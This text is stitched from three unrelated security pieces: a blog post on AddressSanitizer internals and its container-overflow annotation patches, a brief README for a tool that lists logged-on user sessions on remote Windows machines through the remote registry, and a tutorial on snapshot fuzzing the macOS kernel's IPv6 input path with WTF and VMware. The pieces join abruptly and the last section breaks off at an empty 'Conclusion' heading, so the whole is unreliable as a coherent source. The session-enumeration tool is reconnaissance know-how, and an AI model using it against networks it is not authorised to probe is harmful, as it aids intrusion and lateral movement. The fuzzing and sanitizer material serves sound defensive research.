The shadow memory values detail whether a given granule can be fully or partially addressable (accessible by the process), or whether the memory should not be touched by the process. In the latter case, we call this memory βpoisoned,β and the corresponding shadow memory byte value details the reason why ASan thinks so. The shadow memory values legend is printed by ASan along with its reports. Figure 7 shows this legend.
Figure 7: Shadow memory legend (the values are displayed in hexadecimal format)
By updating the state of shadow memory during the process execution, ASan can verify the validity of memory accesses by checking the granuleβs value (and so its accessibility status). If a memory granule is fully accessible, a corresponding shadow byte is set to zero. Conversely, if the whole granule is poisoned, the value is negative. If the granule is partially addressableβi.e., only the first N bytes may be accessed and the rest shouldnβtβthen the number N of addressable bytes is stored in the shadow memory. For example, freed memory on the heap is described with value fd and shouldnβt be used by the process until itβs allocated again. This allows for detecting use-after-free bugs, which often lead to serious security vulnerabilities.
Partially addressable granules are very common. One example may be a buffer on a heap of a size that is not 8-byte-aligned; another may be a variable on the stack that has a size smaller than 8 bytes.
Redzones
Redzones are memory regions inserted into the process memory (and so reflected in shadow memory) that act as buffer zones, separating different objects in memory with poisoned memory. As a result, compiling a program with ASan changes its memory layout.
Letβs look at the shadow memory for the program shown in figure 8, where we introduced three variables on the stack: βbuf,β an array of six items each of 2 bytes, and βaβ and βbβ variables of 2 and 1 bytes.
Figure 8: Example program with an out of bounds memory access error detected by ASan (built with -fsanitize=address -O0 -g3)
Running the program with ASan, as in figure 9, shows us that the problematic memory access hit the βstack right redzoneβ as marked by the β[f3]β shadow memory byte. Note that ASan marked this byte with the arrow before the address and the brackets around the value.
Figure 9: Shadow bytes describing memory area around stack variables from figure 6. Note that the byte 01 corresponds to the variable βb,β the 02 to variable βa,β and 00 04 to the buf array.
This shadow memory along with the corresponding process memory is shown in figure 10. ASan would detect accesses to the bytes colored in red and report them as errors.
Figure 10: Memory layout with ASan. Each cell represents one byte.
Without ASan, the βa,β βb,β and βbufβ variables would likely be next to each other, without any padding between them. The padding was added by the fact that the variables must be partially addressable and because redzones were added in between them as well as before and after them.
Redzones are not added between elements in arrays or in between member variables in structures. This is due to the fact that it would simply break many applications that depend upon the structure layout, their sizes, or simply on the fact that arrays are contiguous in memory.
ASan instrumentation is fully dependent on the compiler; however, implementations are very similar between compilers. Its shadow memory has the same layout and uses the same values in LLVM and GCC, as the latter is based on the former. The instrumented code also calls to special functions defined in compiler-rt, a low-level runtime library from LLVM. It is worth noting that there are also shared or static versions of the ASan libraries, though this may vary based on a compiler or environment.
The ASan instrumentation adds checks to the program code to validate legality of the programβs memory accesses. Those checks are performed by comparing the address and size of the access against the shadow memory. The shadow memory mapping and encoding of values (the fact that granules are of 8 bytes in size) allow ASan to efficiently detect memory access errors and provide valuable insight into the problems encountered.
Letβs look at a simple C++ example compiled and tested on x86-64, where the touch function accesses 8 bytes at the address given in the argument (the touch function takes a pointer to a pointer and dereferences it):
Figure 11: A function accessing memory area of size 8 bytes
Without ASan, the function has a very simple assembly code:
Figure 13 shows that, when compiling code from figure 11 with ASan, a check is added that confirms if the access is correct (i.e., if the whole granule is accessed). We can see that the address that we are going to access is first divided by 8 (shr rax, 3 instruction) to compute its offset in the shadow memory. Then, the program checks if the shadow memory byte is zero; if itβs not, it calls to the __asan_report_load8 function, which makes ASan to report the memory access violation. The byte is checked against zero, because zero means that 8 bytes are accessible, whereas the memory dereference that the program performs returns another pointer, which is of course of 8 bytes in size.
Of course, if the program accessed a smaller region, a different check would have to be generated by the compiler. This is shown in figures 15 and 16, where the program accesses just a single byte.
Figure 15: A function accessing memory area smaller than a granule
Now the function accesses a single byte that may be at the beginning, middle, or the end of a granule, and every granule may be fully addressable, partially addressable, or fully poisoned. The shadow memory byte is first checked against zero, and if it doesnβt match, a detailed check is performed (starting from the .LBB0_1 label). This check will raise an error if the granule is partially addressable and a poisoned byte is accessed (from a poisoned suffix) or if the granule is fully poisoned. (GCC generates similar code.)
Figure 16: An example of a more complex check, confirming legality of the access in function from figure 15, compiled with Clang 15
Can you spot the problem above?
You may have noticed in figures 12-14 that access to poisoned memory may not be detected if the address we read 8 bytes from is unaligned. For such an unaligned memory access, its first and last bytes are in different granules.
The following snippet illustrates a scenario when the address of variable ptr is increased by three and the touch function touches an unaligned address.
The incorrect access from figure 17 is not detected when it is compiled with Clang 15, but it is detected by GCC 12 as long as the function is inlined. If we force non-inlining with __attribute__ ((noinline)), GCC wonβt detect it either. It seems that when GCC is aware of address manipulations that may result in unaligned addressing, it generates a more robust check that detects the invalid access correctly.
ASanβs limitations and quirks
While ASan may miss some bugs, it is important to note that it does not report any false positives if used properly. This means that if it detects a bug, it must be a valid bug in the code, or, a part of the code was not linked with ASan properly (assuming that ASan itself doesnβt have bugs).
However, the ASan implementation in GCC and LLVM include the following limitations or/and quirks:
Redzones are not added between variables in structures.
Access to allocated, but not yet used, memory in a container wonβt be detected, unless the container annotates itself like C++βs std::vector, std::deque, or std::string (in some cases). Note that std::basic_string (with external buffers) and std::deque are annotated in libc++ (thanks to our patches) while std::string is also annotated in Microsoft C++ standard library.
Incorrect access to memory managed by a custom allocator wonβt raise an error unless the allocator performs annotations.
Only suffixes of a memory granule may be poisoned; therefore, access before an unaligned object may not be detected.
ASan may not detect memory errors if a random address is accessed. As long as the random number generator returns an addressable address, access wonβt be considered incorrect
ASan doesnβt understand context and only checks values in shadow memory. If a random address being accessed is annotated as some error in shadow memory, ASan will correctly report that error, even if its bug title may not make much sense.
Because ASan does not understand what programs are intended to do, accessing an array with an incorrect index may not be detected if the resulting address is still addressable, as shown in figure 18.
ASan is designed as a debugging tool for use in development and testing environments and it should not be used on production. Apart from its overhead, ASan shouldnβt be used for hardening as its use could compromise the security of a program. For example, it decreases the effectiveness of ASLR security mitigation by its gigantic shadow memory allocation and it also changes the behavior of the program based on environment variables which could be problematic, e.g., for suid binaries.
If you have any other doubts, you should check the ASan FAQ and for hardening your application, refer to compiler security flags.
Poisoning-only suffixes
Because ASan currently has a very limited number of values in shadow memory, it can only poison suffixes of memory granules. In other words, there is no such value encoding in shadow memory to inform ASan that for a granule a given byte is accessible if it follows an inaccessible (poisoned) byte.
As an example, if the third byte in a granule is not poisoned, the previous two bytes are not poisoned as well, even if logic would require them to be poisoned.
It also means that up to seven bytes may not be poisoned, assuming that an object/variable/buffer starts in the middle or at the last byte of a granule.
False positives due to linking
False positives can occur when only part of a program is built with ASan. These false positives are often (if not always) related to container annotations. For example, linking a library that is both missing instrumentation and modifying annotated objects may result in false positives.
Consider a scenario where the push_back member function of a vector is called. If an object is added at the end of the container in a part of the program that does not have ASan instrumentation, no error will be reported, and the memory where the object is stored will not be unpoisoned. As a result, accessing this memory in the instrumented part of the program will trigger a false positive error.
Similarly, access to poisoned memory in a part of the program that was built without ASan wonβt be detected.
To address this situation, the whole application along with all its dependencies should be built with ASan (or at least all parts modifying annotated containers). If this is not possible, you can turn off container annotations by setting the environment variable ASAN_OPTIONS=detect_container_overflow=0.
Do it yourself: user annotations
User annotations may be used to detect incorrect memory accessesβfor example, when preallocating a big chunk of memory and managing it with a custom allocator or in a custom container. In other words, user annotations can be used to implement similar checks to those std::vector does under the hood in order to detect out-of-bounds access in between the vectorβs data+size and data+capacity addresses.
If you want to make your testing even stronger, you can choose to intentionally βpoisonβ certain memory areas yourself. For this, there are two macros you may find useful:
ASAN_POISON_MEMORY_REGION(addr, size)
ASAN_UNPOISON_MEMORY_REGION(addr, size)
To use these macros, you need to include the ASan interface header:
Figure 19: The ASan API must be included in the program
This makes poisoning and unpoisoning memory quite simple. The following is an example of how to do this:
Figure 20: A program demonstrating user poisoning and its detection.
The program allocates a buffer on heap, poisons the whole buffer (through user poisoning), and then accesses an element from the buffer. This access is detected as forbidden, and the program reports a βPoisoned by userβ error (f7). The figure below shows the buffer (poisoned by user) as well as the heap redzone (fa).
Figure 21: A part of the error message generated by program from figure 20 while compiled with ASan
However, if you unpoison part of the buffer (as shown below, for four elements), no error would be raised while accessing the first four elements. Accessing any further element will raise an error.
Figure 22: An example of unpoisoning memory by user
If you want to understand better how those macros impact the code, you can look into its definition in an ASan interface file.
The ASAN_POISON_MEMORY_REGION and ASAN_UNPOISON_MEMORY_REGION macros simply invoke the __asan_poison_memory_region and __asan_unpoison_memory_region functions from the API. However, when a program is compiled without ASan, these macros do nothing beyond evaluating the macro arguments.
The bug missed by ASan
As we noted previously in the limitations section, ASan does not automatically detect out-of-bound accesses into containers that preallocate memory and manage it. This was also a case we came across during an audit: we found a bug with manual review in code that we were fuzzing and we were surprised the fuzzer did not find it. It turned out that this was because of lack of container overflow detection in the std::basic_string and std::deque collections in libc++.
This motivated us to get involved in ASan development by developing a proof of concept of those ASan container overflow detections in GCC and LLVM and eventually upstream patches to LLVM.
So what was the bug that ASan missed? Figure 23 shows a minimal example of it. The buggy code compared two containers via an std::equal function that took only the first1, last1, and first2 iterators, corresponding to the beginning and end of the first sequence and to the beginning of the second sequence for comparison, assuming the same length of the sequences.
However, when the second container is shorter than the first one, this can cause an out-of-bounds read, which was not detected by ASan and which we changed. With our patches, this is finally detected by ASan.
Figure 23: Code snippet demonstrating the nature of the bug we found during the audit. Container type was changed for demonstrative purposes.
Use ASan to detect more memory safety bugs
We hope our efforts to improve ASanβs state-of-the-art bug detection capabilities will cement its status as a powerful tool for protecting codebases against memory issues.
Weβd like to express our sincere gratitude to the entire LLVM community for their support during the development of our ASan annotation improvements. From reviewing code patches and brainstorming implementation ideas to identifying issues and sharing knowledge, their contributions were invaluable. We especially want to thank vitalybuka, ldionne, philnik777, and EricWF for their ongoing support!
We hope this explanation of AddressSanitizer has been insightful and demonstrated its value in hunting down bugs within a codebase. We encourage you to leverage this knowledge to proactively identify and eliminate issues in your own projects. If you successfully detect bugs with the help of the information provided here, weβd love to hear about it! Happy hunting!
If you need help with ASan annotations, fuzzing, or anything related to LLVM, contact us! We are happy to help tailor sanitizers or other LLVM tools to your specific needs. If youβd like to read more about our work on compilers, check out the following posts: VAST (GitHub repository) and Macroni (GitHub repository).
Retrieve and display information about active user sessions on remote computers. No admin privileges required.
The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.
If the -CheckAdminAccess switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which most likely will retrieve more results)
It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and sessions information will be retrieved. If set to "Disabled" no session information can be retrieved from the target.
Finding novel and unique vulnerabilities often requires the development of unique tools that are best suited for the task. Platforms and hardware that target software run on usually dictate tools and techniques that can be used.Β This is especially true for parts of the macOS operating system and kernel due to its close-sourced nature and lack of tools that support advanced debugging, introspection or instrumentation.Β
Compared to fuzzing for software vulnerabilities on Linux, where most of the code is open-source, targeting anything on macOS presents a few difficulties. Things are closed-source, so we canβt use compile-time instrumentation. While Dynamic Binary instrumentation tools like Dynamorio and TinyInst work on macOS, they cannot be used to instrument kernel components.
There are also hardware considerations β with few exceptions, macOS only runs on Apple hardware. Yes, it can be virtualized, but that has its drawbacks. What this means in practice is that we cannot use our commodity off-the-shelf servers to test macOS code. And fuzzing on laptops isnβt exactly effective.
A while ago, we embarked upon a project that would alleviate most of these issues, and we are making the code available today.Β
Using a snapshot-based approach enables us to target closed-source code without custom harnesses precisely. Researchers can obtain full instrumentation and code coverage by executing tests in an emulator, which enables us to perform tests on our existing hardware. While this approach is limited to testing macOS running on Intel hardware, most of the code is still shared between Intel and ARM versions.Β
Previously in snapshot fuzzing
The simplest way to fuzz a target application is to run it in a loop while changing the inputs. The obvious downside is that you lose time on application initialization, boilerplate code and less CPU time spent on executing the relevant part of the code.
The approach in snapshot-based fuzzing is to define a point in process execution to inject the fuzzing test case (at an entry point of an important function). Then, you interrupt the program at a given point (via breakpoint or other means) and take a snapshot. The snapshot includes all of the virtual memory being used, and the CPU or other process state required to restore and resume process execution. Then, you insert the fuzzing test case by modifying the memory and resume execution.
When the execution reaches a predefined sink (end of function, error state, etc.) you stop the program, discard and replace the state with the previously saved one.
The benefit of this is that you only pay the penalty of restoring the process to its previous state, you donβt create it from scratch. Additionally, suppose you can rely on OS or CPU mechanisms such as CopyOnWrite, page-dirty tracking and on-demand paging. In that case, the operation of restoring the process can be very fast and have little impact on overall fuzzing speed.Β
Cory Duplantis championed our previous attempts at utilizing snapshot-based fuzzing in his work on Barbervisor, abare metal hypervisor developed to support high-performance snapshot fuzzing.
It involved acquiring a snapshot of a full (Virtual Box-based) VM and then transplanting it into Barbervisor where it could be executed. It relied on Intel CPU features to enable high performance by only restoring modified memory pages.
While this showed great potential and gave us a glimpse into the potential utility of snapshot-based fuzzing, it had a few downsides. A similar approach, built on top of KVM and with numerous improvements, was implemented in Snapchange and released by AWS Labs.
Snapshot fuzzing building blocks
Around the time Talos published Barbervisor, Axel Souchet published his WTF project, which takes a different approach. It trades performance to have a clean development environment by relying on existing tooling. It uses Hyper-V to run virtual machines that are to be snapshotted, then uses kd (Windows kernel debugger) to perform the snapshot, which saves the state in a Windows memory dump file format, which is optimized for loading. WTF is written in C++, which means it can benefit from the plethora of existing support libraries such as custom mutators or fuzz generators.
It has multiple possible execution backends, but the most fully featured one is based on Bochs, an x86 emulator, which provides a complete instrumentation framework. The user will likely see a dip in performance β itβs slower than native execution β but it can be run on any platform that Bochs runs on (Linux and Windows, virtualized or otherwise) with no special hardware requirements.
The biggest downside is that it was mainly designed to target Windows virtual machines and targets running on Windows.
When modifying WTF to support fuzzing macOS targets, we need to take care of a few mechanisms that arenβt supported out of the box. Split into pre-fuzzing and fuzzing stages, those include:
A mechanism to debug the OS and process that is to be fuzzed β this is necessary to precisely choose the point of snapshotting.
A mechanism to acquire a copy of physical memory β necessary to transplant the execution into the emulator.
CPU state snapshotting β this has to include all the Control Registers, all the MSRs and other CPU-specific registers that arenβt general-purpose registers.
In the fuzzing stage, on the other hand, we need:
A mechanism to restore the acquired memory pages β this has to be custom for our environment.
A way to catch crashes as crashing/faulting mechanisms on Windows and macOS, which differ greatly.
CPU state, memory modification and coverage analysis will also require adjustments.
DebuggingΒ
For targeting the macOS kernel, weβd want to take a snapshot of an actual, physical, machine. That would give us the most accurate attack surface with all the kernel extensions that require special hardware being loaded and set up. There is a significant attack surface reduction in virtualized macOS.
However, debugging physical Mac machines is cumbersome. It requires at least one more machine and special network adapters, and the debug mechanism isnβt perfect for our goal (relies on non-maskable interrupts instead of breakpoints and doesnβt fully stop the kernel from executing code).
Debugging a virtual machine is somewhat easier. VMWare Fusion contains a gdbserver stub that doesnβt care about the underlying operating system. We can also piggyback on VMWareβs snapshotting feature.Β
The first option enables it, and the second tells gdb stub to use software, as opposed to hardware breakpoints. Hardware breakpoints arenβt supported in Fusion.Β
Attaching to a VM for debugging relies on GDBβs remote protocol:
$ lldb
(lldb) gdb-remote 8864
Kernel UUID: 3C587984-4004-3C76-8ADF-997822977184
Load Address: 0xffffff8000210000
...
kernel was compiled with optimization - stepping may behave oddly; variables may not be available.
Process 1 stopped
* thread #1, stop reason = signal SIGTRAP
Β Β Β Β frame #0: 0xffffff80003d2eba kernel`machine_idle at pmCPU.c:181:3 [opt]
Target 0: (kernel) stopped.
(lldb)
Snapshot acquisition
The second major requirement for snapshot fuzzing is, well, snapshotting. We can piggyback on VMWare Fusion for this, as well.
The usual way to use VMWareβs snapshotting is to either suspend a VM or make an exact copy of the state you can revert to. This is almost exactly what we want to do.
We can set a breakpoint using the debugger and wait for it to be reached. At this point, the whole virtual machine execution is paused. Then, we can take a snapshot of the machine state paused at precisely the instruction we want. There is no need to time anything or inject sentinel instruction. Since we are debugging the VM, we control it fully. A slightly more difficult part is figuring out how to use this snapshot. To reuse them, we needed to figure out the file formats VMware Fusion stores the snapshots in.Β
Fusionβs snapshots consist of two separate files: a vmem file that holds a memory state and a vmsn file that holds the device state, which includes the CPU, all the controllers, busses, pci, disks, etc. β everything thatβs needed to restore the VM.
As far as the memory dump goes, the vmem file is a linear dump of all of the VMβs RAM. If the VM has 2GB of RAM, the vmem file will be a 2GB byte-for-byte copy of the RAMβs contents. This is a physical memory layout because we are dealing with virtual machines and no parsing is required. Instead, we just need a loader.
The machine state file, on the other hand, uses a fairly complex, undocumented format that contains a lot of irrelevant information. We only care about the CPU state, as we wonβt be trying to restore a complete VM, just enough to run a fair bit of code. While undocumented, it has been mostly reverse-engineered for the Volatility project. By extending Volatility, we can get a CPU state dump in the format usable by WhatTheFuzz.
Snapshot loading into WTF
With both file formats figured out, we can return to WTF to modify it accordingly. The most important modification we need to make is to the physical memory loader.
WTF uses Windowsβ dmp file format, so we need our own handler. Since our memory dump file is just a direct one-to-one copy of physical RAM, mapping it into memory and then mapping the pages is very straightforward, as you can see in the following excerpt:
bool BuildPhysmemRawDump(){
Β Β //vmware snapshot is just a raw linear dump of physical memory, with some gaps
Β Β //just fill up a structure for all the pages with appropriate physmem file offsets
Β Β //assuming physmem dump file is from a vm with 4gb of ram
Β Β uint8_t *base = (uint8_t *)FileMap_.ViewBase();
Β Β for(uint64_t iΒ = 0;i < 786432; i++ ){ //that many pages, first 3gb
Β Β Β Β uint64_t offset = i*4096;
Β Β Β Β Physmem_.try_emplace(offset, (uint8_t *)base+offset);
Β Β }
Β Β //there's a gap in VMWare's memory dump from 3 to 4gb, last 1gb is mapped above 4gb
Β Β for(uint64_t iΒ = 0;i < 262144; i++ ){
Β Β Β Β uint64_t offset = (i+786432)*4096;
Β Β Physmem_.try_emplace(i*4096+4294967296, (uint8_t *)base+offset);
Β Β }
Β Β return true;
}
Β We just need to fake the structures with appropriate offsets.Β
Catching crashes
The last piece of the puzzle is how to catch crashes. In WTF, and our modification of it, this is as simple as setting a breakpoint at an appropriate place. On Windows, hooking nt!KeBugCheck2 is the perfect place, we just need a similar thing in the macOS kernel.Β
The kernel panics, exceptions, faults and similar on macOS go through a complicated call stack that ultimately culminates in a complete OS crash and reboot.
Depending on what type of crash we are trying to catch and the type of kernel we are running, we can put a breakpoint on exception_triage function, which is in the execution path between a fault happening and the machine panicking or rebooting:
With that out of the way, we have all the pieces of the puzzle necessary to fuzz a macOS kernel target.
Case study: IPv6 stack
MacOSβ IPv6 stack would be a good example to illustrate how the complete scheme works. This is a simple but interesting entry point into some complex code. Attack surface that is composed of a complex set of protocols, is reachable over the network and is stateful. It would be difficult to fuzz with traditional fuzzers because network fuzzing is slow, and we wouldnβt have coverage. Additionally, this part of the macOS kernel is open-source, making it easy to see if things work as intended. First thing, weβll need to prepare the target virtual machine.
VM preparation
This will assume a few things:
The host machine is a MacBook running macOS 12 Monterey.Β
VMWare fusion as a virtualization platform
Guest VM running macOS 12 Monterey with the following specs:
SIP turned off.
2 or 4 GB of RAM (4 is better, but snapshots are bigger).
One CPU/Core as multithreading just complicates things.
Since we are going to be debugging on the VM, it's prudent to disable SIP before doing anything else.
We'll use VMWare's GDB stub to debug the VM instead of Appleβs KDP because it interferes less with the running VM. The VM doesn't and cannot know that it is enabled.Β
Enabling it is as simple as editing a VM's .vmx file. Locate it in the VM package and add the following lines to the end:
To make debugging, and our lives, easier, we'll want to change some macOS boot options. Since we've disabled SIP, this should be doable from a regular (elevated) terminal:
Disable watchdog via debug=0x100, this will prevent the VM from automatically rebooting in case of a kernel panic.
keepsyms=1, in conjunction with the previous one, prints out the symbols during a kernel panic.
Setting up a KASAN build of the macOS kernel would be a crucial step for actual fuzzing, but not strictly necessary for testing purposes.
Target function
Our fuzzing target is function ip6_input which is the entry point for parsing incoming IPv6 packets.
void
ip6_input(struct mbuf *m)
{
struct ip6_hdr *ip6;
int off = sizeof(struct ip6_hdr), nest;
u_int32_t plen;
u_int32_t rtalert = ~0;
It has a single parameter that contains a mbuf that holds the actual packet data. This is the data we want to mutate and modify to fuzz ipv6_input.
Mbuf structures are a standard structure in XNU and are essentially a linked list of buffers that contain data. We need to find where the actual packet data is (mh_data) and mutate it before resuming execution.Β
struct m_hdr {
struct mbuf *mh_next; /* next buffer in chain */
struct mbuf *mh_nextpkt; /* next chain in queue/record */
caddr_t mh_data; /* location of data */
int32_t mh_len; /* amount of data in this mbuf */
u_int16_t mh_type; /* type of data in this mbuf */
u_int16_t mh_flags; /* flags; see below */
}
This means that we will have to, in the WTF fuzzing harness, dereference a pointer to get to the actual packet data.
Snapshotting
To create a snapshot, we use the debugger to set a breakpoint at ip6_input function. This is where we want to start our fuzzing.
Process 1 stopped
* thread #2, name = '0xffffff96db894540', queue = 'cpu-0', stop reason = signal SIGTRAP
Β Β Β Β frame #0: 0xffffff80003d2eba kernel`machine_idle at pmCPU.c:181:3 [opt]
Target 0: (kernel) stopped.
(lldb) breakpoint set -n ip6_input
Breakpoint 1: where = kernel`ip6_input + 44 at ip6_input.c:779:6, address = 0xffffff800078b54c
(lldb) c
Process 1 resuming
(lldb)
Then, we need to provoke the VM to reach that breakpoint. We can either wait until the VM receives an IPv6 packet, or we can do it manually. To send the actual packet, we prefer using `ping6` because it doesnβt send any SYN/ACKs and allows us to easily control packet size and contents.:
The above simply sends a controlled ICMPv6 ping packet that is as large as possible and padded with 0x41 bytes. We send the packet to the en0 interface β sending to the localhost shortcuts the call stack and packet processing are different. This should give us a nice packet in memory, mostly full of AAAs that we can mutate and fuzz.Β
When the ping6 command is executed, the VM will receive the IPv6 packet and start parsing it, which will immediately reach our breakpoint.
Process 1 stopped
* thread #3, name = '0xffffff96dbacd540', queue = 'cpu-0', stop reason = breakpoint 1.1
frame #0: 0xffffff800078b54c kernel`ip6_input(m=0xffffff904e51b000) at ip6_input.c:779:6 [opt]
Target 0: (kernel) stopped.
(lldb)
The VM is now paused and we have the address of our mbuf that contains the packet which we can fuzz. Fusion's gdb stub seems to be buggy, though, and it leaves that int 3 in place. If we were to take a snapshot now, the first instruction we execute would be that int3, which would immediately break our fuzzing. We need to explicitly disable the breakpoint before taking the snapshot:
Now, we should be in a good place to take our snapshot before something goes wrong. To do that, we simply need to use Fusion's "Snapshot" menu while the VM is stuck on a breakpoint.
VM snapshot state
As mentioned previously, the .vmsn file contains a virtual machine state. The file format is partially documented and we can use a modified version ofΒ Volatility (a patch is available in the repository).Β Β
Simply execute Volatility like so, making sure to point it at the correct `vmsn` file:Β Β
Notice that the above output contains all the same register content as our debugger shows but also contains MSRs, control registers, gdtr and others. This is all we need to be able to start running the snapshot under WTF.Β
Fuzzing harness and fixups
Our fuzzing harness needs to do a couple of things:
Set a few meaningful breakpoints.
A breakpoint on target function return so we know where to stop fuzzing.
A breakpoint on the kernel exception handler so we can catch crashes.Β
Other handy breakpoints that would patch things, or stop the test case if it reaches a certain state.
For every test case, find a proper place in memory, write it there, and adjust the size.
All WTF fuzzers need to implement at least two methods:Β
The above code sets up a breakpoint at the desired address, which executes the anonymous handler function when hit. This handler then stops the execution with Ok_t() type, which signifies the non-crashing end of the test case.Β
Next, we'll want to catch actual exceptions, crashes and panics. Whenever an exception happens in the macOS kernel, the function exception_triage` is called. Regardless if this was caused by something else or by an actual crash, if this function is called, we may as well stop test case execution.Β
We need to get the address of exception_triage first:
(lldb)Β p exception_triage
(kern_return_t (*)(exception_type_t, mach_exception_data_t, mach_msg_type_number_t)) $4 = 0xffffff8000283cb0 (kernel`exception_triage at exception.c:671)
(lldb)
Now, we just need to add a breakpoint at 0xffffff8000283cb0:
This breakpoint is slightly more complicated as we want to gather some information at the time of the crash. When the breakpoint is hit, we want to get a couple of registers that contain information about the exception context we use to form a filename for the saved test case. This helps differentiate unique crashes.Β
Finally, since this is a crashing test case, the execution is stopped with Crash_t() which saves the crashing test case.Β
With that, the basic Init function is complete.Β
InsertTestcase
The function InsertTestcase is what inserts the mutated data into the target's memory before resuming execution. This is where you would sanitize any necessary input and figure out where you want to put your mutated data in memory.Β
Our target function's signature is ip6_input(struct mbuf *), so the mbuf struct will hold the actual data. We can use lldb at our first breakpoint to figure out where the data is:Β Β
At the start of ip6_input function, inspecting m_hdr of the first parameter shows us that it has 40 bytes of data at 0xffffff904e51b0d8 which looks like a standard ipv6 header. Additionally, grabbing mh_next and inspecting it shows that it contains data at 0xffffff904e373000 of size 1,024, which consists of ICMP6 data and our AAAAs.
To properly fuzz all IPv6 protocols, we'll mutate the IPv6 header and encapsulated packet. We'll need to separately copy 40 bytes over to the first mbuf and the rest over to the second mbuf.
For the second mbuf (the ICMPv6 packet), we need to write our mutated data at 0xffffff904e373000. This is fairly straightforward, as we don't need to read or dereference registers or deal with offsets:
We could also update the mbuf size, but we'll limit the mutated test case size instead. And that's it β our fuzzing harness is pretty much ready.
Everything together
Every WTF fuzzer needs to have a state directory and three things in it:
Mem.dmp: A full dump of RAM.
Regs.json: A JSON file describing CPU state.
Symbol-store.json: Not really required, can be empty, but we can populate it with addresses of known symbols, so we can use those instead of hardcoded addresses in the fuzzer.
Next, copy the snapshot's .vmm file over to your fuzzing machine and rename it to mem.dmp. Write the VM state that we got from volatility into a file called regs.json.
With the state set up, we can make a test run. Compile the fuzzer and test it like so:
load raw mem dump1
Done
Setting debug register status to zero.
Setting debug register status to zero.
Segment with selector 0 has invalid attributes.
Segment with selector 0 has invalid attributes.
Segment with selector 8 has invalid attributes.
Segment with selector 0 has invalid attributes.
Segment with selector 10 has invalid attributes.
Segment with selector 0 has invalid attributes.
Trace file .\ipv6.trace
Running inputs\ipv6
--------------------------------------------------
Run stats:
Instructions executed: 13001 (4961 unique)
Β Β Β Β Β Β Dirty pages: 229376 bytes (0 MB)
Β Β Memory accesses: 46135 bytes (0 MB)
#1 cov: 4961 exec/s: infm lastcov: 0.0s crash: 0 timeout: 0 cr3: 0 uptime: 0.0s
Β
c:\work\codes\wtf\targets\ipv6_input>
In the above, we run WTF in run mode with tracing enabled. We want it to run the fuzzer with specified input and save a RIP trace file that we can then examine. As we can see from the output, the fuzzer run was completed successfully. The total number of instructions was 13,001 (4,961 of which were unique) and most notably, the run was completed without a crash or a timeout.Β
Analyzing coverage and symbolizing
WTF's symbolizer relies on the fact that the targets it runs are on Windows and that it generally has PDBs. Emulating that completely would be too much work, so I've opted to instead do some LLDB scripting and symbolization.Β
First, we need LLDB to dump out all known symbols and their addresses. That's fairly straightforward with the script supplied in the repository. The script will parse the output of image dump symtab command and perform some additional querying to resolve the most symbols. The result is a symbol-store.json file that looks something like this:
Β The trace file we obtained from the fuzzer is just a text file containing addresses of executed instructions. Supporting tools include a symbolize.py script which uses a previously generated symbol store to symbolize a trace. Running it on ipv6.trace would result in a symbolized trace:
The complete trace is longer, but at the end, can easily see that the retq instruction was reached if we compared the function offsets.Β
Trace files are also compatible with Ida Lighthouse, so we can just load them into it to get a visual coverage overview:
Green nodes have been hit.
Avoiding checksum problems
Even without manual coverage analysis, with IPv6 as a target, it would be quickly apparent that a feedback-driven fuzzer isnβt getting very far. This is due to various checksums that are present in higher-level protocol packets, for example, TCP packet checksums. Randomly mutated data would invalidate the checksum and the packet would be rejected early.Β
There are two options to deal with this issue: We can fix the checksum after mutating the data, or leverage instrumentation to NOP out the code that performs the check. This is easily achieved by setting yet another breakpoint in the fuzzing harness that will simply modify the return value of the checksum check:
Now that we know that things work, we can start fuzzing. In one terminal, we start the server:
c:\work\codes\wtf\targets\ipv6_input>..\..\src\build\wtf.exe master --max_len=1064 --runs=1000000000 --target .
Seeded with 3801664353568777264
Iterating through the corpus..
Sorting through the 1 entries..
Running server on tcp://localhost:31337..
And in another, the actual fuzzing node:
c:\work\codes\wtf\targets\ipv6_input> ..\..\src\build\wtf.exe fuzz --backend=bochscpu --name IPv6_InputΒ --limit 5000000
Β
The debugger instance is loaded with 0 items
load raw mem dump1
Done
Setting debug register status to zero.
Setting debug register status to zero.
Segment with selector 0 has invalid attributes.
Segment with selector 0 has invalid attributes.
Segment with selector 8 has invalid attributes.
Segment with selector 0 has invalid attributes.
Segment with selector 10 has invalid attributes.
Segment with selector 0 has invalid attributes.
Dialing to tcp://localhost:31337/..
YouΒ should quickly see in the server window that coverage increases and that new test cases are being found and saved:
Likewise, the fuzzing node will show its progress:
The debugger instance is loaded with 0 items
load raw mem dump1
Done
Setting debug register status to zero.
Setting debug register status to zero.
Segment with selector 0 has invalid attributes.
Segment with selector 0 has invalid attributes.
Segment with selector 8 has invalid attributes.
Segment with selector 0 has invalid attributes.
Segment with selector 10 has invalid attributes.
Segment with selector 0 has invalid attributes.
Dialing to tcp://localhost:31337/..
#10437 cov: 9778 exec/s: 1.0k lastcov: 0.0s crash: 0 timeout: 0 cr3: 0 uptime: 10.0s
#20682 cov: 9781 exec/s: 1.0k lastcov: 3.0s crash: 0 timeout: 0 cr3: 0 uptime: 20.0s
#31402 cov: 9781 exec/s: 1.0k lastcov: 13.0s crash: 0 timeout: 0 cr3: 0 uptime: 30.0s
#42667 cov: 9781 exec/s: 1.1k lastcov: 23.0s crash: 0 timeout: 0 cr3: 0 uptime: 40.0s
#53698 cov: 9781 exec/s: 1.1k lastcov: 33.0s crash: 0 timeout: 0 cr3: 0 uptime: 50.0s
#64867 cov: 9781 exec/s: 1.1k lastcov: 43.0s crash: 0 timeout: 0 cr3: 0 uptime: 60.0s
#75446 cov: 9781 exec/s: 1.1k lastcov: 53.0s crash: 0 timeout: 0 cr3: 0 uptime: 1.2min
#84790 cov: 10497 exec/s: 1.1k lastcov: 0.0s crash: 0 timeout: 0 cr3: 0 uptime: 1.3min
#95497 cov: 11704 exec/s: 1.1k lastcov: 0.0s crash: 0 timeout: 0 cr3: 0 uptime: 1.5min
#105469 cov: 11761 exec/s: 1.1k lastcov: 4.0s crash: 0 timeout: 0 cr3: 0 uptime: 1.7min
Conclusion
